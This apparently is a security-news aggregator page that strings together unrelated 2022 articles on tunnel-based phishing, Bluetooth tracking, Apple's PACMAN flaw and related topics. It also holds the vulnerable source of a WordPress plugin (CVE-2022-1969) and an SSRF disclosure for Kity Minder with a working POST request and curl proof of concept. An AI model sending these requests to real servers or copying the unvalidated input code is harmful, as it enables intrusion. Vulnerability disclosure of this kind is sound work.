New hacking technique allows threat actors to evade some of the most effective phishing countermeasures

New hacking technique allows threat actors to evade some of the most effective phishing countermeasures

A new way of carrying out phishing attacks is being adopted by criminal groups – and it could make threat actors virtually undetectable, security researchers warn.

The technique involves using ‘reverse tunnel’ services and URL shorteners to launch large-scale phishing attacks. What’s more, the groups using these techniques leave no trace.

Instead, threat actors can use their local machines to host phishing pages on random URLs. These can help evade detection by URL scanning services. The groups can then further mask their identities using URL shortener services.

**Down the hole**

The attackers are not exploiting a vulnerability in the technical sense. Instead, they are misusing off-the-shelf, legitimate services to bypass anti-phishing measures. Services associated with the technique include bit.ly, Ngrok, and Cloudflare’s Argo Tunnel.

The attack was detected by security researchers at CloudSEK, who found that the method was being used to target customers of Indian banks.

Here, phishing attacks were attempting to dupe customers into handing over their banking details, Aadhaar (Indian national identity) number, and other sensitive information.

**CATCH UP** Apple showcases next-gen security tech at WWDC 2022

“We discovered it when we were monitoring the internet for our client-related assets, impersonations, and data,” Darshit Ashara, principal threat researcher at CloudSEK, told _The Daily Swig_.

“During the regular course of our research, we started noticing patterns of such abuse of multiple reverse tunnel services.”

Although CloudSEK detected phishing attempts against Indian bank clients, the technique has also been used in the US, the UK, and Europe.

“Reverse tunnel attacks have become quite common these days,” Ashara added. “The modus operandi of threat actors using reverse tunneling includes sending SMS-based spam with phishing URLs shortened using popular URL shortening services.

“We have observed this technique being used to target most major brands and organizations.”

The reverse tunneling and URL shortening attack in action (Image: CloudSEK)

**Hiding in the shadows**

Reverse tunnels allows criminal groups to evade some of the most effective countermeasures.

One way phishing groups are caught is through their reliance on hosting providers, and their use of domains that, CloudSEK says, “impersonate targeted companies or keywords”.

Even where there is not enough evidence for law enforcement to go after the phishing groups, hosting providers will take down the spoof domains.

Read more of the latest infosec research from around the world

Using domains with “random or generic” keywords provides some protection for the attackers, as they cannot be reported for brand infringement. But cybercriminals are able to use reverse tunnels to bypass hosting completely by storing the phishing binaries on nothing more than a local PC.

Adding URL shortening on top makes it even harder to trace the attack and can make victims more likely to fall for the scams. Add to this the fact that most reverse tunnel URLs are temporary – typically operating for just 24 hours – and attribution and prosecution becomes far harder still.

**Improved monitoring**

CloudSEK is calling for improved monitoring of reverse tunnel services. Ngrok, for example, now requires its users to disclose their IP addresses, and to register before hosting HTML content, while Cloudflare requires users to create an account.

URL shortening is harder to police, as there is no actual malicious activity: they simply point users to a website. CloudSEK concedes, though, that discovering attacks depends on third-party monitoring.

Targeted firms may, then, have to rely on user education to tackle this attack vector.

“Effectively, this is another channel for phishing attacks – the key difference is attribution,” said Chris Preece, head of cyber operations at digital risk management consultancy Protection Group International.

“If a domain is registered with a hosting provider, they can respond to complaints and take down a website, but with reverse tunnels, the reverse tunnel provider has no accountability for that, which means it’s potentially harder to take down. Combine that with a URL shortener, it can be very effective.

“It’s going to sound clichéd, but the advice we have is to double down on phishing awareness to lessen the likelihood of someone clicking on a malicious link.”

**YOU MIGHT ALSO LIKE** Chinese cyber threat actors are widely abusing well-known attacks to infiltrate networks

Cybercriminals use reverse tunneling and URL shorteners to launch ‘virtually undetectable’ phishing campaigns

The Mobile browser color select plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.0.1. This is due to missing or incorrect nonce validation on the admin_update_data() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via forged request granted they can trick a site administrator into performing an action such as clicking on a link.

1<?php2/\*3 \* Plugin Name: Mobile browser color select4 \* Description: UPDATE YOUR BROWSER COLOR WITH JUST ONE CLICK.<br>With this plugin you can select your browser tab color and save.<br><strong>no professional experince required</strong><br>dont forget to rate and share ♥5 \* Version: 1.0.16 \* Author: www.script.co.il7 \* Author URI: https://www.script.co.il/8 \* License: GPLv2 or later9 \* Text Domain: mbcs10\*/1112if (!defined( 'ABSPATH' )) die('whhhhattt??!');131415class mobile\_browser\_color\_select{16    17    private $color, $option\_id;1819    public function \_\_construct (){20        $this\->option\_id \= 'mbcs\_browser\_color';21        $this\->color \= get\_option( $this\->option\_id );22        if ( is\_admin() ){23            //INIT WORDPRESS COLOR PICKER INTO ADMIN PANEL24            $this\->admin\_create\_section();25            26            //INIT LANGUAGES27            add\_action( 'plugins\_loaded', array($this, 'init\_languages' ));28        }else{29            //INIT COLOR INTO WORDPRESS MARKUP LET THE MAGIC BEGIN30            if (! $this\->color) return;31            $this\->front\_output\_markup();32        }33        34    }35        36    public function admin\_create\_section(){37        // INIT MENU38        add\_action( 'admin\_menu', array($this, 'add\_my\_menu' ) );39        40        // INIT COLOR PICKER41        add\_action('admin\_enqueue\_scripts', function(){42            wp\_enqueue\_style( 'wp-color-picker' );43                wp\_enqueue\_script( 'mb\_chrome\_script', plugins\_url('init.js', \_\_FILE\_\_ ), array( 'wp-color-picker' ), true, true );44        });45    }46    47    public function add\_my\_menu(){48        add\_options\_page( 'Mobile browser color', \_\_('Mobile browser color select', 'mbcs'), 'manage\_options', 'mobile-browser-color-select', array($this, 'admin\_page\_content') );49    }50    51    public function init\_languages(){52        load\_plugin\_textdomain( 'mbcs', false, basename( dirname( \_\_FILE\_\_ ) ) . '/languages' ); 53    }54    55    public function admin\_page\_content(){56        57        $this\->admin\_update\_data();58        $this\->back\_output\_markup();59        60    }61    62    public function admin\_update\_data(){63        if (! empty( $\_POST\['color'\] ) ){64            $this\->color \= $\_POST\['color'\];65            update\_option($this\->option\_id, $this\->color);66        }67    }68    69    public function front\_output\_markup(){70        add\_action('wp\_head', function(){71                        echo '72                        <meta name="theme-color" content="' . $this\->color . '">73                        74                        <meta name="msapplication-navbutton-color" content="' . $this\->color . '">75                        76                        <meta name="apple-mobile-web-app-capable" content="yes">77                        <meta name="apple-mobile-web-app-status-bar-style" content="' . $this\->color . '">'; 78        });79    }80    81    public function back\_output\_markup(){82        ?>83        <form method="post">84            <h1><?\= \_e('Tab color', 'mbcs'); ?></h1>85            <label for="color"><?\= \_e('Choose color', 'mbcs'); ?>:</label>86            <input type="text" id="color" name="color" value="<?\= $this\->color; ?>">87            <button type="submit"><?\= \_e('Save', 'mbcs'); ?></button>88        </form>89        <?php90    }9192}93    9495$mbcs \= new mobile\_browser\_color\_select();

CVE-2022-1969: mobile-browser-color-select.php in mobile-browser-color-select/trunk – WordPress Plugin Repository

By Deeba Ahmed
Even unpaired smartphones are vulnerable to tracking. According to a study  by the University of California San Diego’s engineers,…
This is a post from HackRead.com Read the original post: Bluetooth Signals Can Be Abused To Detect and Track Smartphones

Even unpaired smartphones are vulnerable to tracking.

According to a study  by the University of California San Diego’s engineers, the Bluetooth signals that our cellphones constantly emit make the device vulnerable to abuse. It is the first-of-its-kind research in which it was concluded that Bluetooth signals assign a unique fingerprint, allowing tracking of the user’s movements and location.

For your information, modern cellular devices use Bluetooth signals to enable device tracking services like Apple’s Find My feature and COVID-19 tracing applications and establish a connection between devices such as wireless earphones and smartphones.

The team comprised researchers from UC San Diego’s Departments of Computer Science and Engineering and Electrical and Computer Engineering.

**Privacy Risks Posed by Bluetooth Beacons**

Researchers revealed that all devices with Bluetooth pairing capability, from smartphones and smartwatches to fitness trackers, are vulnerable to tracking. That’s because these devices transmit Bluetooth Beacons continuously. This transmission rate is around 500 beacons per minute.

They further noted that it is a significant threat because the tracking can be done accurately. The paper’s lead author, Nishant Bhaskar, wrote that the threat emerges from the constant emission of Bluetooth signals. An adversary can stalk a user by placing BLE receives strategically to record the user’s beacons.

What’s worth noting is that even unpaired devices are at risk because these beacons stop emitting only when the phone is off. Hence, the flaw poses serious privacy risks for users.

**Why Bluetooth Signals Assign Fingerprints?**

The paper highlighted that all wireless devices come with minor manufacturing glitches in the hardware, which are unique for each device. These technical and hardware glitches cause unique distortions used as fingerprints for highly accurate device tracking. These fingerprints are also an unintended byproduct of the device manufacturing process.

**More Bluetooth flaws News**

*   BleedingTooth Bluetooth vulnerability allows RCE in Linux devices
*   Update your devices: New Bluetooth flaw lets attackers monitor traffic
*   BlueBorne Bluetooth Flaw Affects Millions of Smartphones, IoT and PCs
*   BlueRepli attack lets hackers bypass Bluetooth authentication on Android
*   Attackers Can Unlock Tesla Cars, Smart Devices by Exploiting Bluetooth Flaws

**Real-Life Experiments**

To test their hypothesis, researchers developed an algorithm that evaluated two different values extracted from Bluetooth signals. The variations in these values were due to the Bluetooth hardware defects or imperfections, hence assigning the unique fingerprint to the device.

Researchers examined this theory on 40 percent of the 162 mobile devices used in public areas like cafes and identified each of them. Then they experimented on 647 mobile phones in a public hallway and found unique fingerprints on 47% of them.

However, they also noted that ambient temperature changes could alter Bluetooth fingerprints and different devices send different degrees of power for Bluetooth signals affecting the distance at which these devices can be tracked. This indicates the attacker cannot easily track a device without adequate expertise.

Researchers presented their findings at the IEE Security & Privacy conference held on 24 May 2022 in Oakland, California.

Bluetooth Signals Can Be Abused To Detect and Track Smartphones

Plus: Russia rattles its cyber sword, a huge Facebook phishing operation is uncovered, feds take down the SSNDOB marketplace, and more.

How do you smuggle information into the USSR right under the nose of the KGB? Create your own encryption system, of course. That’s exactly what saxophonist and music professor Merryl Goldberg did during the 1980s. This week Goldberg revealed that she used musical notation to hide the names and addresses of activists and details of meetings on a rare trip to the Soviet Union. To do so, she cooked up her own encryption system. Each musical note and marking represented letters of the alphabet and helped disguise the sensitive information. When Soviet officers inspected the documents, no suspicions were raised.

Goldberg’s story was retold at the RSA Conference in San Francisco this week, where WIRED’s Lily Newman has been digging up stories. Also coming out of RSA: a warning that as ransomware becomes less profitable, attackers may turn to business email compromise (BEC) scams to make money—BEC attacks are already highly profitable.

Also this week, dark-web marketplace AlphaBay is about to complete its journey back to the top of the online underworld. The original AlphaBay site—home to more than 350,000 product listings, ranging from drugs to cybercrime services—was purged from the dark web in July 2017 as part of a huge law enforcement operation. However, AlphaBay’s second-in-command, an actor going by the name of DeSnake, survived the law enforcement operation and relaunched the site last year. Now AlphaBay is growing quickly and is on the verge of resuming its dominant dark-web market position.

Elsewhere, Apple held its annual Worldwide Developers Conference this week and revealed iOS 16, macOS Ventura and some new MacBooks—WIRED’s Gear team has you covered on everything Apple announced at WWDC. However, there are two standout new security features worth mentioning: Apple is replacing passwords with new cryptographic passkeys, and it’s introducing a safety check feature to help people in abusive relationships. Database firm MongoDB also held its own event this week, and while it might not have been as high-profile as WWDC, MongoDB’s new Queryable Encryption tool may be a key defense against preventing data leaks.

Also this week we’ve reported on a Tesla flaw that lets anyone create their own NFC car key. New research from the ​​Mozilla Foundation has found that disinformation and hate speech are flooding TikTok ahead of Kenya’s elections, which take place at the start of August. Elon Musk reportedly gained access to Twitter’s “fire hose,” raising privacy concerns. And we dove into the shocking new evidence televised by the House January 6 committee.

But that's not all, folks. Each week we round up the big security and privacy news we didn't cover ourselves. Click the links for the full stories, and stay safe out there.

For the past two years, state-sponsored hackers working on behalf of the Chinese government have targeted scores of communications technologies, ranging from home routers to large telecom networks. That’s according to the NSA, FBI, and the Cybersecurity and Infrastructure Security Agency (CISA), which published a security advisory this week detailing the “widespread” hacking.

Since 2020, Chinese-backed actors have been exploiting publicly known software flaws in hardware and incorporating compromised devices into their own attack infrastructure. According to the US agencies, the attacks typically contained five steps. China’s hackers would use publicly available tools to scan for vulnerabilities in networks. They would then gain initial access through online services, access login details from the systems, get access to routers and copy network traffic, before finally “exfiltrating” victim data.

“Exploiting these vulnerabilities has allowed them to establish broad infrastructure networks to exploit a wide range of public- and private-sector targets,” the agencies say in their joint advisory.

Since the start of the war in Ukraine, Russia has been hacked at an unprecedented scale. Now, more than 100 days into the war, tensions around cyber activity are rising. On June 9, Russia’s Foreign Ministry said that its critical infrastructure and government bodies were being hit by cyberattacks and warned that it could lead to military confrontation with the West. “The militarization of the information space by the West, and attempts to turn it into an arena of interstate confrontation, have greatly increased the threat of a direct military clash with unpredictable consequences,” the Foreign Ministry said in a statement. From the moment Russian troops entered Ukraine, questions have been raised about the potential for escalation if people outside of Ukraine are involved in cyberattacks against Russia. Last week, the head of US Cyber Command told _Sky News_ that its military hackers have been involved in offensive operations that support Ukraine.

Phishing remains one of the most successful ways for criminals to break into people’s accounts and make money—and there’s no better example of this than a newly uncovered Facebook and Facebook Messenger phishing campaign. This week, security researchers at US firm PIXM revealed a huge network of at least 400 phishing pages that are raking in millions of views and have made its creators an estimated $59 million. The scam, which has been running since at least September 2021, directs people to false Facebook login pages where their credentials are hoovered up. What stands out, as noted by the Register, is that the phishing campaign has managed to avoid Facebook’s phishing detection methods more effectively than others.

So far in 2022, police and tech companies have been cracking down on cybercriminals with some success: Raidforums, ZLoader, and the dark-web market Hydra have all been shut down in recent months. That list got a little bit longer this week as the FBI and its international law enforcement took down a marketplace selling the personal information of around 24 million Americans, according to authorities. The SSNDOB marketplace, which was made up of four individual domains, was selling people’s names, dates of birth, and Social Security numbers. SSNDOB has existed for around a decade, and in 2013, details obtained from the organization were used in the takeover of Xbox Live accounts. It’s believed the website has made its unknown owners around $22 million since 2015.

How China Hacked US Phone Networks

A novel hardware attack dubbed PACMAN has been demonstrated against Apple's M1 processor chipsets, potentially arming a malicious actor with the capability to gain arbitrary code execution on macOS systems.
It leverages "speculative execution attacks to bypass an important memory protection mechanism, ARM Pointer Authentication, a security feature that is used to enforce pointer integrity," MIT

A novel hardware attack dubbed **PACMAN** has been demonstrated against Apple's M1 processor chipsets, potentially arming a malicious actor with the capability to gain arbitrary code execution on macOS systems.

It leverages "speculative execution attacks to bypass an important memory protection mechanism, ARM Pointer Authentication, a security feature that is used to enforce pointer integrity," MIT researchers Joseph Ravichandran, Weon Taek Na, Jay Lang, and Mengjia Yan said in a new paper.

What's more concerning is that "while the hardware mechanisms used by PACMAN cannot be patched with software features, memory corruption bugs can be," the researchers added.

The vulnerability is rooted in pointer authentication codes (PACs), a line of defense introduced in arm64e architecture that aims to detect and secure against unexpected changes to pointers — objects that store a memory address — in memory.

PACs aim to solve a common problem in software security, such as memory corruption vulnerabilities, which are often exploited by overwriting control data in memory (i.e., pointers) to redirect code execution to an arbitrary location controlled by the attacker.

While strategies like Address Space Layout Randomization (ASLR) have been devised to increase the difficulty of performing buffer overflow attacks, the goal of PACs is to ascertain the "validity of pointers with minimal size and performance impact," effectively preventing an adversary from creating valid pointers for use in an exploit.

This is achieved by protecting a pointer with a cryptographic hash — called a Pointer Authentication Code (PAC) — to ensure its integrity. Apple explains PACs as follows -

_Pointer authentication works by offering a special CPU instruction to add a cryptographic signature — or PAC — to unused high-order bits of a pointer before storing the pointer. Another instruction removes and authenticates the signature after reading the pointer back from memory. Any change to the stored value between the write and the read invalidates the signature. The CPU interprets authentication failure as memory corruption and sets a high-order bit in the pointer, making the pointer invalid and causing the app to crash._

But PACMAN "removes the primary barrier to conducting control-flow hijacking attacks on a platform protected using pointer authentication." It combines memory corruption and speculative execution to circumvent the security feature, leaking "PAC verification results via microarchitectural side channels without causing any crashes."

The attack method, in a nutshell, makes it possible to distinguish between a correct PAC and incorrect hash, permitting a bad actor to "brute-force the correct PAC value while suppressing crashes and construct a control-flow hijacking attack on a PA-enabled victim program or operating system."

The crash prevention, for its part, succeeds because each PAC value is speculatively guessed by exploiting a timing-based side channel via the translation look-aside buffer (TLB) using a Prime+Probe attack.

Speculative execution vulnerabilities, as observed in the case of Spectre and Meltdown, weaponize out-of-order execution, a technique that's used to bring about a performance improvement in modern microprocessors by predicting the most likely path of a program's execution flow.

However, it's worth noting that the threat model presumes that there already exists an exploitable memory corruption vulnerability in a victim program (kernel), which, in turn, allows the unprivileged attacker (a malicious app) to inject rogue code into certain memory locations in the victim process.

"This attack has important implications for designers looking to implement future processors featuring pointer authentication, and has broad implications for the security of future control-flow integrity primitives," the researchers concluded.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

MIT Researchers Discover New Flaw in Apple M1 CPUs That Can't Be Patched

The proof-of-concept attack from MIT CSAIL researchers undermines the pointer authentication feature used to defend the Apple chip's OS kernel.

Security researchers today released details about a new attack they designed against Apple's M1 processor chip that can undermine a key security feature that protects the operating system (OS) kernel from memory corruption attacks. Dubbed PACMAN, the proof-of-concept attack targets ARM Pointer Authentication, a processor hardware feature that's used as a last line of defense against software bugs that can be leveraged to corrupt the content of a memory location, hijack the execution flow of a running program, and ultimately gain complete control of the system.

"The idea behind pointer authentication is that if all else has failed, you still can rely on it to prevent attackers from gaining control of your system," says MIT CSAIL Ph.D. student Joseph Ravichandran, co-lead author of a new paper about PACMAN. "We've shown that pointer authentication as a last line of defense isn't as absolute as we once thought it was."

Lauded as the most powerful chips Apple has ever built, the M1 Pro and M1 Max were rolled out last fall to accolades not only for their power efficiency and performance, but also for the security afforded by the M1 system-on-chip (SoC) architecture.

Among those defenses is pointer authentication, an ARM feature that defends pointer integrity in memory by protecting pointers with a cryptographic hash that verifies they haven't been modified. That hash is called a Pointer Authentication Code (PAC), which the system uses to validate the use of a protected pointer by a program. When the wrong PAC is used, a program will crash. PAC sizes are relatively small, but a straight brute-forcing attack would cause enough crashes to detect malicious behavior — not to mention that a program restart causes the PAC to be refreshed.

The MIT CSAIL team shows that it is possible to use a hardware side-channel attack to brute-force a PAC value and suppress crashes, kicking off a chained attack to ultimately build out a control-flow hijacking attack.

"The key insight of the PACMAN attack is to use speculative execution attacks to leak PAC verification results stealthily via micro-architectural side channels without causing crashes," the paper explains.

Since the attack uses the speculative execution space, it doesn't leave behind traces — and being a hardware attack, it also can't be patched. The work offers a tangible example of how the one-two punch of hardware vulnerabilities and low-level software flaws can provide ample opportunities for attackers to run rampant in the kernel.

**New Tools for Vulnerability Research**

According to MIT professor and paper co-author Mengjia Yan, her team's work offers insight into why software vulnerabilities at the kernel level should still be of concern to developers.

"It's a new way to look at this very long-lasting security threat model. Many other mitigation mechanisms exist that are not well studied under this new compounding threat model, so we consider the PACMAN attack as a starting point," she says. "We hope PACMAN can inspire more work in this research direction in the community."

To encourage researchers to build off of their work, the MIT CSAIL team is releasing two sets of tools that are a product of their work analyzing Apple chips, which are closed source and undocumented.

"We expect these tools to unblock the community from conducting research on existing and future Apple Silicon devices," the paper states, announcing availability of the tools at pacmanattack.com.

Design Weakness Discovered in Apple M1 Kernel Protections

Sabre and Travelport had to report the weekly activities of former “Cardplanet” cybercriminal Aleksei Burkov for two years, info that eventually led to his arrest and prosecution.

Sabre and Travelport had to report the weekly activities of former “Cardplanet” cybercriminal Aleksei Burkov for two years, info that eventually led to his arrest and prosecution.

The U.S. government ordered two travel companies to provide information about the movement of a Russian citizen suspected of hacking. The surveillance data was used as part of an investigation by the U.S. Secret Service, according to court documents recently unsealed.

The revelation of the extent of surveillance that the feds ordered companies to do in a 2015 investigation of Russian hacker Aleksei Burkov once again raises questions of privacy, accountability and responsibility in terms of how much access the government should have to an individual’s private data.

A letter from Forbes prompted the unsealing of court documents in the case Burkov, a now-infamous cybercriminal who at the time of the investigation was suspected of facilitating the theft of $20 million from stolen credit cards on a website called Cardplanet that he was running on the dark web.

The feds arrested Burkov at Ben-Gurion Airport near Tel Aviv in December 2015, and he eventually was extradited to the U.S. in 2019. In January 2020, he pleaded guilty to one count of access device fraud and one count of conspiracy to commit access device fraud, identity theft, computer intrusions, wire fraud and money laundering.

Burkov eventually was sentenced to nine years in a federal prison, but mysteriously sent back to Russia in September 2021 for reasons which are still unclear, according to Forbes.

Forbes submitted a legal challenge to unseal documents in the case, which it won, subsequently publishing a report this week on what those documents revealed: extensive surveillance of Burkov by two travel companies, U.S.-based Sabre and U.K.-based Travelport, at the behest of the feds. The government used this data to track Burkov’s movements which eventually led to his arrest and prosecution.

****Tracking Burkov’s Movement****

The court documents show that in November 2015, a judge in the U.S. District Court for the Eastern District of Virginia granted a request by the U.S. government and ordered Sabre and Travelport to provide “all records, services and usages” of Burkov for a two-year period following the issuing of the order. The companies also had to provide a “real time” report on a weekly basis of  Burkov’s account activity to the feds.

The order was granted under the All Writs Act, a broad, 233-year-old law that allows for the government to “issue all writs necessary and appropriate” to aid authorities in their quest for the “proper administration of justice.”

The act is open to interpretation and has already been used a number of times by the U.S. government as a means of forcing tech companies into giving up information to aid them in investigations—a situation the American Civil Liberties Union deems “improper use.”

Indeed, the act has most often been used against tech giants Google and Apple to force them to help the federal government unlock Android devices or iPhones of suspects in criminal cases.

The most high-profile of these cases came after a 2015 mass shooting in San Bernadino, Calif., when Apple held its ground in its refusal to unlock the iPhone of shooter Syed Rizwan Farook. Eventually, the case came to end when the FBI managed to unlock the device without Apple’s help.

****Privacy Issues or Just Cause?****

While privacy advocates believe the federal use of the courts to force tech companies to give up data that customers shared with them in privacy is an overreach, security professionals for the most part support the action in the case of criminal investigations—to a point.

The monitoring of Burkov’s movement to apprehend him was justified due to the criminal nature of his activity, one security professional told Threatpost.

“After reviewing the facts of the case, a federal judge agreed there was enough cause and issued a ruling that authorized this activity,” Rosa Smothers, a former CIA cyber threat analyst and technical intelligence officer and current senior vice president at security firm KnowBe4, wrote in an email to Threatpost. “This was not a case of rogue government officials conducting unapproved data collection.”

Another security professional said that he’s not overly concerned if the federal government uses legal means to get access to private data collected by technology companies. However, it’s not always clear who has access to the “massive troves of data” being collected by companies like Meta and Google, observed John Bambenek, Principal Threat Hunter at security and operations analytics company Netenrich, in an email to Threatpost. This, he said, is concerning and should be remedied.

“Whether its Meta saying they can’t figure out where personal data is being used inside Meta, or law enforcement being able to get real time information on suspects, society just hasn’t come to grips with the implications of surveillance capitalism,” he said.

Feds Forced Travel Firms to Share Surveillance Data on Hacker

AI works best when security professionals and AI are complementing each other.

Artificial intelligence has advanced greatly in the past decade. On my phone, I'm reading Apple and Google news that is well-tailored to me, thanks to AI recommendation models. Self-driving cars are already picking up passengers for rides in downtown San Francisco.

The same transformation is happening in the cybersecurity world too. However, questions remain: Will AI replace security professionals? Or will AI still be as useful in the zero-trust era given that access is tightened to the minimum already?

AI was introduced to the center stage of the cybersecurity industry a few years ago, originally to tackle malware detection and anomaly detection use cases. We have come a long way to better understand both the usefulness and the limitations of applying AI to cybersecurity, especially in the zero-trust era.

**AI Is Still Needed**

First, a zero-trust architecture doesn't remove the need for AI. Though zero trust eliminates the attack surface and reduces the chance for the anomaly to happen, zero trust demands AI more.

Today, an enterprise user's security policy is typically that person's department security policy. Whether users are in a big or a small department, they all follow very similar, if not the same, security policy, including access control policy.

In the zero-trust era, we need a personalized, contextual, dynamic, and granular security policy — which is exactly what zero trust is about. Access control, for instance, is no longer based on simple rules but a set of complex policies based on your identity, your device, your posture, your intention, your risks, your content, and a lot of rich data points.

However, generating such complex, granular, and personalized policy _at scale_ can be very time-consuming if relying on human rules and heuristics. Different employees will use different applications and such application usage may need to evolve fast in a short period of time. AI is a critical technology to make such an intelligent and personalized security policy recommendation at scale.

At the same time, it is impossible for AI to capture or comprehend all the nuances and contexts of any complex environment, so AI may make recommendations that are suboptimal from experts' eyes. With ongoing human feedback, we can improve the AI model and its effectiveness.

**Threat Detection**

Second, zero trust gives the enterprise much tighter protection than it has had in the past, but no matter how tightened things are, there is always a weak link somewhere. Therefore, we want AI to assist with evasive and unknown threat detection and prevention.

Some evasive threats are undetected in time by conventional signature-based or sandbox technology. The SolarWinds supply chain attack is a good example. This global attack turned the SolarWinds Orion software into a weapon, subsequently gaining access to several government systems and thousands of private systems around the world. There was no involvement from any malware by the traditional definition, and it was hard to rely on any single layer of the conventional technology to detect such an attack ahead of time.

AI has a good potential to be the technology to do a better job with unknown threat detection because it can "predict" threats that have never been seen before.

Practically, we will want to layer multiple security technologies along with AI. For instance, in the case of malware, the tried-and-true approach of signature matching and sandbox will continue to play a key role. AI will complement greatly, but not displace, the conventional technology.

**Easily Understood**

Third, enterprise customers want to utilize AI in a way that is easily understood and digestible by security professionals. The "explainable AI" may not improve the AI model efficacy on the surface, but it will increase the adoption of AI significantly.

For instance, AI may be able to detect an unknown threat, but SecOps teams may want to see which family the threat belongs to before taking an action. For another example, AI may be able to generate intelligent and relevant security policy recommendations, but SecOps teams may still want to know the context of why certain recommendations are made before accepting them.

**Conclusion**

The cybersecurity industry needs AI to help reduce unknown attacks at scale and come up with granular and contextual security policies at scale to reduce the attack surface. We want the result to be explainable too.

AI-powered security tools and products are an amazing digital assistant to SecOps professionals. And professionals are assisting AI technology to advance, too, as we will need humans to verify many of the outputs and/or provide feedback for the AI model to improve.

AI is useful to scale the enterprise security functions, like more-intelligent policies and more-intelligent threat detection as discussed above. AI works best when security professionals and AI are complementing each other. In the end, AI is an assistant to security professionals and will not be a replacement for human effort for a long time to come.

How AI Is Useful — and Not Useful — for Cybersecurity

A newly designed privacy-sensitive architecture aims to enable developers to create smart home apps in a manner that addresses data sharing concerns and puts users in control over their personal information. 
Dubbed Peekaboo by researchers from Carnegie Mellon University, the system "leverages an in-home hub to pre-process and minimize outgoing data in a structured and enforceable manner before

A newly designed privacy-sensitive architecture aims to enable developers to create smart home apps in a manner that addresses data sharing concerns and puts users in control over their personal information.

Dubbed **Peekaboo** by researchers from Carnegie Mellon University, the system "leverages an in-home hub to pre-process and minimize outgoing data in a structured and enforceable manner before sending it to external cloud servers."

Peekaboo operates on the principle of data minimization, which refers to the practice of limiting data collection to only what is required to fulfill a specific purpose.

To achieve this the system requires developers to explicitly declare the relevant data collection behaviors in the form of a manifest file that's then fed into an in-home trusted hub to transmit sensitive data from smart home apps such as smart doorbells on a need-to-know basis.

The hub not only functions as a mediator between raw data from IoT devices and the respective cloud services, it also enables third-party auditors to vet an app developer's data collection claims.

The manifest file, for its part, is analogous to Android's "AndroidManifest.xml" file that details the permissions the app needs in order to access protected parts of the system or other apps.

But while it is more of a binary approach in Android where apps are either unilaterally allowed or denied access to a specific feature (e.g., camera), Peekaboo makes it possible to define the data collection practices — the kind of data to be gathered, when it should be carried out, and how frequently.

"With Peekaboo, a user can install a new smart home app by simply downloading a manifest to the hub rather than a binary," the researchers explained.

"This approach offers more flexibility than permissions, as well as a mechanism for enforcement. It also offers users (and auditors) more transparency about a device's behavior, in terms of what data will flow out, at what granularity, where it will go, and under what conditions."

What's more, Peekaboo is also designed to auto-generate live privacy nutrition labels that summarize an app's declared behavior à la Apple's privacy labels in iOS and Android's Data safety section.

"Peekaboo offers a hybrid architecture, where a local user-controlled hub pre-processes smart home data in a structured manner before relaying it to external cloud servers," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New Privacy Framework for IoT Devices Gives Users Control Over Data Sharing

Kity Minder v1.3.5 was discovered to contain a Server-Side Request Forgery (SSRF) via the init function at ImageCapture.class.php.

Server-side request forgery (also known as SSRF) is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

Impact version: v1.3.5  
Test with PHP 7.2

The vulnerable code is located in the init function of the native-support/archive/src/ImageCapture.class.php file, which does not sufficiently validate the image parameter, leading to a taint introduced from the native-support/export.php file in the $_REQUEST['data'] variable in the native-support/export.php file and eventually enters the tainted function curl_init, which, after the curl_exec function is executed, sends a request to the URL specified by the image parameter, eventually leading to an SSRF vulnerability.

The function call path is as follows.

    file: native-support/export.php 
    code: $file = Parser::toXMind( $_REQUEST['data'] );
    
    file: native-support/archive/src/Parser.class.php
    code: return XMindParser::parse( htmlspecialchars( $source, ENT_NOQUOTES ), $previewImage );
    
    file: native-support/archive/src/Parser.xmind.class.php
    code: $data = self::doParse( $sourceJSON );
    
    file: native-support/archive/src/Parser.xmind.class.php
    code: 'topic' => self::parseTopic( $source, $attachments )
    
    file: native-support/archive/src/Parser.xmind.class.php
    code: self::parseImage( $source, $attachments );
    
    file: native-support/archive/src/Parser.xmind.class.php
    code: $image = ImageCapture::capture( $source[ 'data' ][ 'image' ] );
    
    file: native-support/archive/src/ImageCapture.class.php
    code: $curl = self::init( $url );
    

The vulnerable function init

private static function init ( $url ) {

    $curl = curl\_init( $url );

    curl\_setopt( $curl, CURLOPT\_AUTOREFERER, true );
    curl\_setopt( $curl, CURLOPT\_FOLLOWLOCATION, true );
    curl\_setopt( $curl, CURLOPT\_RETURNTRANSFER, true );
    curl\_setopt( $curl, CURLOPT\_RETURNTRANSFER, true );

    // 尝试连接时间 10s
    curl\_setopt( $curl, CURLOPT\_RETURNTRANSFER, 10 \* 1000 );
    curl\_setopt( $curl, CURLOPT\_MAXREDIRS, 5 );
    curl\_setopt( $curl, CURLOPT\_TIMEOUT, 30 );

    return $curl;

}

Because the image parameter is unrestricted, it is also possible to use the server side to send requests, such as probing intranet web services. The corresponding PoC is as follows

    POST /export.php HTTP/1.1
    Host: 172.16.119.1:81
    Content-Length: 64
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://172.16.119.1:81
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://172.16.119.1:81/export.php
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: close
    
    type=xmind&data={"data":{"image":"http://172.16.119.1/testpoc"}}
    

You can also use the following curl command to verify the vulnerability

    curl -i -s -k -X $'POST' \
        -H $'Host: 172.16.119.1:81' -H $'Content-Length: 64' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Connection: close' \
        --data-binary $'type=xmind&data={\"data\":{\"image\":\"http://172.16.119.1/testpoc\"}}' \
        $'http://172.16.119.1:81/export.php'

CVE-2022-31830: [Vuln] SSRF vulnerability in `init` Function of `ImageCapture.class.php` File (Kity Minder v1.3.5 version) · Issue #345 · fex-team/kityminder

Tag

#apple